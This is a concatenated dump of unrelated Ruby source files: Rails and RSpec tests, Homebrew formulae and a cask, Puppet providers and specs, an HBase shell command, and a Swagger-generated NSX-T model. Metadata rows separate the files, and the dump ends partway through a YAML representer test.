ActiveRecord::Base.connection.instance_eval do
execute "INSERT INTO #{quote_table_name :sample} (#{quote_column_name :id}, #{quote_column_name :field1}, #{quote_column_name :field2}) VALUES (15, 'text3', 11)"
id = select_value("SELECT #{quote_column_name :id} FROM #{quote_table_name :sample}").to_i
end
assert_equal 15, id
end
def assert_auto_increments
if ENV['DB'] == 'mysql'
extra = extract_extra_attributes('id')
assert_match(/auto_increment/i, extra)
end
ids = []
ActiveRecord::Base.connection.instance_eval do
3.times do |n|
execute "INSERT INTO #{quote_table_name :sample} (#{quote_column_name :field1}, #{quote_column_name :field2}) VALUES ('text#{n}', #{n})"
end
ids = select_rows("SELECT #{quote_column_name :id} FROM #{quote_table_name :sample}").map{|r| r.first.to_i }.sort
end
assert_equal [1,2,3], ids
assert_equal Sample.count, 3
end
def extract_extra_attributes(field_name)
ActiveRecord::Base.connection.instance_eval do
execute_and_free("SHOW FULL FIELDS FROM #{quote_table_name :sample}") do |result|
each_hash(result).detect{|field| field[:Field] == field_name}[:Extra]
end
end
end
end | 32.474359 | 167 | 0.717331 |
4a52eb0ef7d5a8b4fb2092b2987a11eb22d22444 | 1,272 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module Shell
module Commands
class SetAuths < Command
def help
return <<-EOF
Add a set of visibility labels for a user or group
Syntax : set_auths 'user',[label1, label2]
For example:
hbase> set_auths 'user1', ['SECRET','PRIVATE']
hbase> set_auths '@group1', ['SECRET','PRIVATE']
EOF
end
def command(user, *args)
format_simple_command do
visibility_labels_admin.set_auths(user, args)
end
end
end
end
end
| 31.02439 | 74 | 0.720126 |
e87e9a87caf2b45e803c20ad4372406f85b67987 | 598 | cask 'virtualhostx' do
version '7.3.0,7_19'
sha256 '0ae7cef8c94d48eb2ebd63df7bae8422c68f3801b8412d2f67d7f80e8e9104ce'
# downloads-clickonideas.netdna-ssl.com/virtualhostx was verified as official when first introduced to the cask
url "https://downloads-clickonideas.netdna-ssl.com/virtualhostx/virtualhostx#{version.after_comma}.zip"
appcast 'https://shine.clickontyler.com/appcast.php?id=33',
checkpoint: 'e6ff3d5015f7c35f72c44f433656ecc7fefb76fc947b9d5ebf516338b62e2425'
name 'VirtualHostX'
homepage 'https://clickontyler.com/virtualhostx/'
app 'VirtualHostX.app'
end
| 42.714286 | 113 | 0.801003 |
4a29b560f1211a937cba39839cc95c3aabd1923a | 1,507 | RSpec.describe ExceedingRequestsController, type: :controller do
let!(:user) { create(:user) }
let!(:account) { create(:account) }
let!(:account_user) do
create(:account_user,
user_id: user.id,
account_id: account.id,
role_id: Role.find_by(name: 'owner').id
)
end
before { sign_in user }
describe 'POST create' do
context 'with valid params' do
it 'would create request if it was created in new limit period' do
post :create, params: { account_id: account.id, exceeding_request: { amount: 1 } }
Timecop.freeze(Date.today + 1) do
post :create, params: { account_id: account.id, exceeding_request: { amount: 2 } }
end
expect(ExceedingRequest.count).to eq(2)
end
end
context 'with invalid params' do
it 'would not create request if it was created in current limit period' do
post :create, params: { account_id: account.id, exceeding_request: { amount: 1 } }
post :create, params: { account_id: account.id, exceeding_request: { amount: 2 } }
expect(ExceedingRequest.count).to eq(1)
end
end
end
describe 'DELETE destroy' do
it 'will delete request from table' do
req = ExceedingRequest.new(amount: 10)
req.account_user = account_user
req.save!
count = ExceedingRequest.count
delete :destroy, params: { account_id: account.id, id: req.id }
expect(ExceedingRequest.count).to eq(count - 1)
end
end
end
| 33.488889 | 92 | 0.643663 |
91ad1d5870affd769a1e223569ffa3f98a022fbb | 383 | require_dependency 'spree/shipping_calculator'
module Spree
module Calculator::Shipping
class SelfDelivery < Spree::ShippingCalculator
def self.description
I18n.t :self_delivery
end
def compute(object)
object = object.order unless object.kind_of?(Spree::Order)
object.self_delivery_point.try(:cost) || 0
end
end
end
end
| 21.277778 | 66 | 0.686684 |
33f15c42ff14c29b73b06780371ac063b5ea18ed | 605 | =begin
Mojang API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
OpenAPI spec version: 2020-06-05
Generated by: https://github.com/openapitools/openapi-generator.git
=end
class NameHistoryController < ApplicationController
def find_unique_ids_by_name
# Your code here
render json: {"message" => "yes, it worked"}
end
def get_name_history
# Your code here
render json: {"message" => "yes, it worked"}
end
def get_unique_id_by_name
# Your code here
render json: {"message" => "yes, it worked"}
end
end
| 20.166667 | 106 | 0.722314 |
910fe5a877e9bb8a0869bbd99bfc78edf4235d15 | 1,726 | class Yamllint < Formula
include Language::Python::Virtualenv
desc "Linter for YAML files"
homepage "https://github.com/adrienverge/yamllint"
url "https://github.com/adrienverge/yamllint/archive/v1.11.1.tar.gz"
sha256 "56221b7c0a50b1619e491eb157624a5d1b160c1a4f019d64f117268f42fe4ca4"
revision 1
bottle do
cellar :any
rebuild 1
sha256 "3ffaafca879769be72b0a8a98be07f8ffe746f8488f4430863fb8380544ab01c" => :high_sierra
sha256 "921109aebc30770d96997b33565faf1d21f5821d4bf9e19d18fc6e0f5908712a" => :sierra
sha256 "17ec47b0462e157f33a61fa95462c1b6f7bdd329fd687a870317c4eb4aeeaf9c" => :el_capitan
sha256 "08c77688d24055fa4c35485923d55755e087b8d87d1691eca3be8f791dacae45" => :x86_64_linux
end
depends_on "libyaml"
depends_on "python"
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/9e/a3/1d13970c3f36777c583f136c136f804d70f500168edc1edea6daa7200769/PyYAML-3.13.tar.gz"
sha256 "3ef3092145e9b70e3ddd2c7ad59bdd0252a94dfe3949721633e41344de00a6bf"
end
resource "pathspec" do
url "https://files.pythonhosted.org/packages/5e/59/d40bf36fda6cc9ec0e2d2d843986fa7d91f7144ad83e909bcb126b45ea88/pathspec-0.5.6.tar.gz"
sha256 "be664567cf96a718a68b33329862d1e6f6803ef9c48a6e2636265806cfceb29d"
end
def install
virtualenv_install_with_resources
end
test do
(testpath/"bad.yaml").write <<~EOS
---
foo: bar: gee
EOS
output = shell_output("#{bin}/yamllint -f parsable -s bad.yaml", 1)
assert_match "syntax error: mapping values are not allowed here", output
(testpath/"good.yaml").write <<~EOS
---
foo: bar
EOS
assert_equal "", shell_output("#{bin}/yamllint -f parsable -s good.yaml")
end
end
| 33.843137 | 138 | 0.765353 |
331ad2419a6e525fc33c4754bf9db6661d99b47b | 90 | class Management::Admin::ShippersController < ApplicationController
def index; end
end
| 18 | 67 | 0.811111 |
18a635135167946f236bcb9f4912d8ec5877a48c | 2,116 | class Geeqie < Formula
desc "Lightweight Gtk+ based image viewer"
homepage "http://www.geeqie.org/"
# URL needs to be an unshallow clone because it needs history to generate
# the changelog documentation.
# Unfortunately this means that the tarball can't be used to build;
# this is documented in the makefile.
url "https://github.com/BestImageViewer/geeqie.git",
:tag => "v1.4",
:revision => "7c9b41e7c9be8cfc9b4f0a2459c0a1e0e4aaea5b",
:shallow => false
revision 1
bottle do
sha256 "a559b5497adfaadb9ae785d47abf74f856ee0aa34126325a380565a0ec6836ad" => :mojave
sha256 "0bf35c40d3d0fc9a3bb6d69cd079e7e3f9aae4d1c050cead01aca59bea009d22" => :high_sierra
sha256 "54a1af6f886c7a95b3f66ea0996a6acfa1531b940d274921a84cdef57c1fc54f" => :sierra
sha256 "2f84465d9d6eba2db0031c71033b735d33a6d6294dd2a15fd13d65674b60783b" => :el_capitan
end
# Fixes the build on OS X by assigning a value to a variable
# before passing to WEXITVALUE.
# https://github.com/BestImageViewer/geeqie/pull/589
patch do
url "https://raw.githubusercontent.com/Homebrew/patches/9cacfd49be1db430d7a956132d6521e23fc85f77/geeqie/wexitstatus_fix.diff"
sha256 "00bad28d46aafaaed99965a5c054bf04679c100c6f4f13ee82cf83c2782de349"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "intltool" => :build
depends_on "pkg-config" => :build
depends_on "adwaita-icon-theme"
depends_on "atk"
depends_on "cairo"
depends_on "exiv2"
depends_on "gdk-pixbuf"
depends_on "gettext"
depends_on "glib"
depends_on "gtk+3"
depends_on "imagemagick"
depends_on "jpeg"
depends_on "libtiff"
depends_on "little-cms2"
depends_on "pango"
def install
ENV["NOCONFIGURE"] = "yes"
system "./autogen.sh"
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-glibtest",
"--disable-gtktest",
"--enable-gtk3"
system "make", "install"
end
test do
system "#{bin}/geeqie", "--version"
end
end
| 34.129032 | 129 | 0.702268 |
bbd6d06da672f7a14cd87b0e14a905c4e318c877 | 9,716 | require 'spec_helper'
require 'fixtures/unit/puppet/provider/brocade_alias_membership/brocade_alias_membership_fixture'
describe "Brocade Alias Membership Provider" do
#Given
before(:each) do
@fixture = Brocade_alias_membership_fixture.new
mock_transport=double('transport')
@fixture.provider.stub(:transport).and_return(mock_transport)
Puppet.stub(:info)
Puppet.stub(:debug)
end
context "when brocade alias membership provider is created " do
it "should have parent 'Puppet::Provider::Brocade_fos'" do
@fixture.provider.should be_kind_of(Puppet::Provider::Brocade_fos)
end
it "should have create method defined for brocade alias membership" do
@fixture.provider.class.instance_method(:create).should_not == nil
end
it "should have destroy method defined for brocade alias membership" do
@fixture.provider.class.instance_method(:destroy).should_not == nil
end
it "should have exists? method defined for brocade_alias_membership" do
@fixture.provider.class.instance_method(:exists?).should_not == nil
end
end
context "when brocade alias membership is created" do
before(:each) do
@createInfoMsg = Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_EXIST_INFO%[@fixture.get_member_name,@fixture.get_alias_name]
end
it "should raise error if response contains 'not found' while creating brocade alias membership" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name],NOOP_HASH).and_return(Puppet::Provider::Brocade_responses::RESPONSE_NOT_FOUND)
@fixture.provider.should_not_receive(:cfg_save)
#When
expect {@fixture.provider.create}.to raise_error(Puppet::Error)
end
it "should raise error if response contains 'invalid' while creating brocade alias membership" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_INVALID)
@fixture.provider.should_not_receive(:cfg_save)
#When
expect {@fixture.provider.create}.to raise_error(Puppet::Error)
end
it "should warn if brocade alias membership already exists" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_ALREADY_CONTAINS)
Puppet.should_receive(:info).once.ordered.with(@createInfoMsg).and_return("")
@fixture.provider.should_not_receive(:cfg_save)
#When
@fixture.provider.create
end
it "should save the configuration, if brocade alias membership is created successfully" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_ADD_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return("")
@fixture.provider.should_receive(:cfg_save).once
#When
@fixture.provider.create
end
end
context "when brocade alias membership is deleted" do
before(:each) do
@destroyInfoMsg = Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name]
end
it "should save the configuration, if brocade alias membership is deleted successfully" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return("")
@fixture.provider.should_receive(:cfg_save).once.ordered
#When
@fixture.provider.destroy
end
it "should warn if brocade alias name does not exist" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_IS_NOT_IN)
Puppet.should_receive(:info).once.ordered.with(@destroyInfoMsg).and_return("")
@fixture.provider.should_not_receive(:cfg_save)
#When
@fixture.provider.destroy
end
it "should raise error if response contains 'does not exist' while deleting the brocade alias membership" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
@fixture.provider.should_not_receive(:cfg_save)
#When
expect {@fixture.provider.destroy}.to raise_error(Puppet::Error)
end
it "should raise error if response contains 'is not in' while deleting the brocade alias membership" do
#Then
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_MEMBER_REMOVE_COMMAND%[@fixture.get_alias_name,@fixture.get_member_name], NOOP_HASH).and_return(Puppet::Provider::Brocade_responses::RESPONSE_IS_NOT_IN)
Puppet.should_receive(:info).once.ordered.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
@fixture.provider.should_not_receive(:cfg_save)
#When
@fixture.provider.destroy
end
end
context "when brocade alias membership existence is validated" do
it "should warn if brocade alias name does not exist and when ensure property is given present" do
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_DOES_NOT_EXIST_INFO%[@fixture.get_alias_name])
@fixture.provider.exists?.should == true
end
it "should warn if brocade alias name does not exist and when ensure property is given absent" do
@fixture.set_ensure_value_absent
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(Puppet::Provider::Brocade_responses::RESPONSE_DOES_NOT_EXIST)
Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_DOES_NOT_EXIST_INFO%[@fixture.get_alias_name])
@fixture.provider.exists?.should == false
end
it "should return false if brocade alias name exist and wwpn is not associated to it when ensure property is given present" do
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
@fixture.provider.exists?.should == false
end
it "should return true if brocade alias name exist and wwpn is associated to it when ensure property is given present" do
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
@fixture.provider.exists?.should == true
end
it "should warn if brocade alias name exist and wwpn is associated to it when ensure property is given present" do
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_EXIST_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
@fixture.provider.exists?.should == true
end
it "should return true if brocade alias name exist and wwpn is associated to it when ensure property is given absent" do
@fixture.set_ensure_value_absent
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return(@fixture.get_member_name)
@fixture.provider.exists?.should == true
end
it "should return false if brocade alias name exist and wwpn is not associated to it when ensure property is given absent" do
@fixture.set_ensure_value_absent
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
@fixture.provider.exists?.should == false
end
it "should warn if brocade alias name exist and wwpn is not associated to it when ensure property is given absent" do
@fixture.set_ensure_value_absent
@fixture.provider.transport.should_receive(:command).once.with(Puppet::Provider::Brocade_commands::ALIAS_SHOW_COMMAND%[@fixture.get_alias_name], NOOP_HASH).ordered.and_return("")
Puppet.should_receive(:info).once.with(Puppet::Provider::Brocade_messages::ALIAS_MEMBERSHIP_ALREADY_REMOVED_INFO%[@fixture.get_member_name,@fixture.get_alias_name])
@fixture.provider.exists?.should == false
end
end
end
| 52.804348 | 276 | 0.771511 |
1814ac21db34e8534fe6b18eead86b82a0ca0fe9 | 344 | # frozen_string_literal: true
module ActiveJob
# Returns the version of the currently loaded Active Job as a <tt>Gem::Version</tt>
def self.gem_version
Gem::Version.new VERSION::STRING
end
module VERSION
MAJOR = 6
MINOR = 1
TINY = 4
PRE = "4"
STRING = [MAJOR, MINOR, TINY, PRE].compact.join(".")
end
end
| 19.111111 | 85 | 0.651163 |
ff61a81562e12264a773e399080dad9d66a92c3d | 1,156 | # frozen_string_literal: true
require 'hanami/model'
require 'securerandom'
class User < Hanami::Entity
GUEST_EMAIL = '[email protected]'
GUEST_NAME = 'Guest User'
GUEST_PROFILE = 'This is the Guest User. It can do nothing.'
def guest?
name == GUEST_NAME && email == GUEST_EMAIL && profile == GUEST_PROFILE
end
end
class UserRepository < Hanami::Repository
def find_by_name(name)
users.where(name: name).map_to(User).one
end
def find_by_token(token)
users.where(token: token).map_to(User).one
end
# NOTE: TIL: `entity` is a `class_attribute` added to any class that inherits
# from `Hanami::Repository` which, naturally enough, has the Class of
# the Entity associated with that Repository. It turns hard-coded Entity
# class names in client-repository code from a necessity into a smell.
def self.guest_user
@guest_user ||= entity.new name: User::GUEST_NAME, email: User::GUEST_EMAIL,
password_hash: SecureRandom.alphanumeric(48),
profile: User::GUEST_PROFILE, id: -1
end
def guest_user
self.class.guest_user
end
end
| 29.641026 | 80 | 0.682526 |
4adf54dee68c84fe89598068269a0095e2dc2010 | 1,614 | ###
# Copyright (c) 2015, Upnext Technologies Sp. z o.o.
# All rights reserved.
#
# This source code is licensed under the BSD 3-Clause License found in the
# LICENSE.txt file in the root directory of this source tree.
###
class DeviseCreateAdmins < ActiveRecord::Migration
def change
create_table(:admins) do |t|
## Database authenticatable
t.string :email, :null => false, :default => ""
t.string :encrypted_password, :null => false, :default => ""
## Recoverable
t.string :reset_password_token
t.datetime :reset_password_sent_at
## Rememberable
t.datetime :remember_created_at
## Trackable
t.integer :sign_in_count, :default => 0, :null => false
t.datetime :current_sign_in_at
t.datetime :last_sign_in_at
t.string :current_sign_in_ip
t.string :last_sign_in_ip
## Confirmable
t.string :confirmation_token
t.datetime :confirmed_at
t.datetime :confirmation_sent_at
# t.string :unconfirmed_email # Only if using reconfirmable
## Lockable
# t.integer :failed_attempts, :default => 0, :null => false # Only if lock strategy is :failed_attempts
# t.string :unlock_token # Only if unlock strategy is :email or :both
# t.datetime :locked_at
t.timestamps null: false
end
add_index :admins, :email, :unique => true
add_index :admins, :reset_password_token, :unique => true
add_index :admins, :confirmation_token, :unique => true
# add_index :admins, :unlock_token, :unique => true
end
end
| 32.28 | 110 | 0.651797 |
911cd18a22762917d948253b60aedbb8e4678373 | 202 | class CreateWegroups < ActiveRecord::Migration[5.1]
def change
create_table :wegroups do |t|
t.string :name
t.references :user, foreign_key: true
t.timestamps
end
end
end
| 18.363636 | 51 | 0.668317 |
62d08ce1a4ba47d07d6d5b9b7caadd983ba2f612 | 136 | # API for default State filter preferences
class StatesController < ApplicationController
def index
@states = State.all
end
end
| 19.428571 | 46 | 0.772059 |
f87cc07ddc8b10ecb4d3edf3e155cc3fa5a1bf5e | 7,052 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
# Traffic counters for IPSec VPN session.
class IPSecVpnTrafficCounters
# Total number of packets sent.
attr_accessor :packets_out
# Total number of outgoing packets dropped on outbound security association.
attr_accessor :dropped_packets_out
# Total number of bytes recevied.
attr_accessor :bytes_in
# Total number of bytes sent.
attr_accessor :bytes_out
# Total number of incoming packets dropped on inbound security association.
attr_accessor :dropped_packets_in
# Total number of packets received.
attr_accessor :packets_in
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'packets_out' => :'packets_out',
:'dropped_packets_out' => :'dropped_packets_out',
:'bytes_in' => :'bytes_in',
:'bytes_out' => :'bytes_out',
:'dropped_packets_in' => :'dropped_packets_in',
:'packets_in' => :'packets_in'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'packets_out' => :'Integer',
:'dropped_packets_out' => :'Integer',
:'bytes_in' => :'Integer',
:'bytes_out' => :'Integer',
:'dropped_packets_in' => :'Integer',
:'packets_in' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'packets_out')
self.packets_out = attributes[:'packets_out']
end
if attributes.has_key?(:'dropped_packets_out')
self.dropped_packets_out = attributes[:'dropped_packets_out']
end
if attributes.has_key?(:'bytes_in')
self.bytes_in = attributes[:'bytes_in']
end
if attributes.has_key?(:'bytes_out')
self.bytes_out = attributes[:'bytes_out']
end
if attributes.has_key?(:'dropped_packets_in')
self.dropped_packets_in = attributes[:'dropped_packets_in']
end
if attributes.has_key?(:'packets_in')
self.packets_in = attributes[:'packets_in']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
packets_out == o.packets_out &&
dropped_packets_out == o.dropped_packets_out &&
bytes_in == o.bytes_in &&
bytes_out == o.bytes_out &&
dropped_packets_in == o.dropped_packets_in &&
packets_in == o.packets_in
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[packets_out, dropped_packets_out, bytes_in, bytes_out, dropped_packets_in, packets_in].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.755274 | 107 | 0.626631 |
18119939ddf5bb580f352212af2e68a3fdb025ff | 3,286 | require File.join(File.dirname(__FILE__), '../f5')
require 'json'
Puppet::Type.type(:f5_monitor).provide(:external, parent: Puppet::Provider::F5) do
has_feature :external
def initialize(value={})
super(value)
@create_elements = false
end
def self.instances
instances = []
monitors = Puppet::Provider::F5.call_items('/mgmt/tm/ltm/monitor/external')
return [] if monitors.nil?
monitors.each do |monitor|
aliasAddress, aliasServicePort = monitor['destination'].split(':')
instances << new(
ensure: :present,
alias_address: aliasAddress,
alias_service_port: aliasServicePort,
parent_monitor: monitor['defaultsFrom'] || 'none',
external_program: monitor['run'],
arguments: monitor['args'],
variables: monitor['apiRawValues'],
description: monitor['description'],
interval: monitor['interval'],
name: monitor['fullPath'],
manual_resume: monitor['manualResume'],
time_until_up: monitor['timeUntilUp'],
timeout: monitor['timeout'],
up_interval: monitor['upInterval'],
)
end
instances
end
def self.prefetch(resources)
nodes = instances
resources.keys.each do |name|
if provider = nodes.find { |node| node.name == name }
resources[name].provider = provider
end
end
end
def message(object)
# Allows us to pass in resources and get all the attributes out
# in the form of a hash.
message = object.to_hash
# Map for conversion in the message.
map = {
:'external-program' => :run,
:arguments => :args,
:variables => :apiRawValues,
:'parent-monitor' => :defaultsFrom,
}
message.delete(:parent_monitor) if message[:parent_monitor] == "none"
message = strip_nil_values(message)
message = convert_underscores(message)
message = rename_keys(map, message)
message = create_message(basename, partition, message)
message = string_to_integer(message)
message = destination_conversion(message)
elements_to_strip = [:'alias-address', :'alias-service-port']
message = strip_elements(message, elements_to_strip)
message.to_json
end
def flush
if @property_hash != {}
result = Puppet::Provider::F5.put("/mgmt/tm/ltm/monitor/external/#{api_name}", message(@property_hash))
end
return result
end
def exists?
@property_hash[:ensure] == :present
end
def create
@create_elements = true
result = Puppet::Provider::F5.post("/mgmt/tm/ltm/monitor/external", message(resource))
# We clear the hash here to stop flush from triggering.
@property_hash.clear
return result
end
def destroy
result = Puppet::Provider::F5.delete("/mgmt/tm/ltm/monitor/external/#{api_name}")
@property_hash.clear
return result
end
mk_resource_methods
def parent_monitor=(value)
fail ArgumentError, "ERROR: Attempting to change `parent_monitor` from '#{self.provider.parent_monitor}' to '#{self[:parent_monitor]}'; cannot be modified after a monitor has been created."
end
end
| 30.146789 | 193 | 0.632075 |
3902f249cf1d28a69b0787d048a964b90c6b56d1 | 3,672 | require 'test_helper'
class YamlTest < MiniTest::Spec
def self.yaml_representer(&block)
Module.new do
include Representable::YAML
instance_exec &block
end
end
def yaml_representer(&block)
self.class.yaml_representer(&block)
end
describe "property" do
let (:yaml) { yaml_representer do property :best_song end }
let (:album) { Album.new.tap do |album|
album.best_song = "Liar"
end }
describe "#to_yaml" do
it "renders plain property" do
album.extend(yaml).to_yaml.must_equal(
"---
best_song: Liar
")
end
it "always renders values into strings" do
Album.new.tap { |a| a.best_song = 8675309 }.extend(yaml).to_yaml.must_equal(
"---
best_song: 8675309
"
)
end
end
describe "#from_yaml" do
it "parses plain property" do
album.extend(yaml).from_yaml(
"---
best_song: This Song Is Recycled
").best_song.must_equal "This Song Is Recycled"
end
end
describe "with :class and :extend" do
yaml_song = yaml_representer do property :name end
let (:yaml_album) { Module.new do
include Representable::YAML
property :best_song, :extend => yaml_song, :class => Song
end }
let (:album) { Album.new.tap do |album|
album.best_song = Song.new("Liar")
end }
describe "#to_yaml" do
it "renders embedded typed property" do
album.extend(yaml_album).to_yaml.must_equal "---
best_song:
name: Liar
"
end
end
describe "#from_yaml" do
it "parses embedded typed property" do
album.extend(yaml_album).from_yaml("---
best_song:
name: Go With Me
").must_equal Album.new(nil,Song.new("Go With Me"))
end
end
end
end
describe "collection" do
let (:yaml) { yaml_representer do collection :songs end }
let (:album) { Album.new.tap do |album|
album.songs = ["Jackhammer", "Terrible Man"]
end }
describe "#to_yaml" do
it "renders a block style list per default" do
album.extend(yaml).to_yaml.must_equal "---
songs:
- Jackhammer
- Terrible Man
"
end
it "renders a flow style list when :style => :flow set" do
yaml = yaml_representer { collection :songs, :style => :flow }
album.extend(yaml).to_yaml.must_equal "---
songs: [Jackhammer, Terrible Man]
"
end
end
describe "#from_yaml" do
it "parses a block style list" do
album.extend(yaml).from_yaml("---
songs:
- Off Key Melody
- Sinking").must_equal Album.new(["Off Key Melody", "Sinking"])
end
it "parses a flow style list" do
album.extend(yaml).from_yaml("---
songs: [Off Key Melody, Sinking]").must_equal Album.new(["Off Key Melody", "Sinking"])
end
end
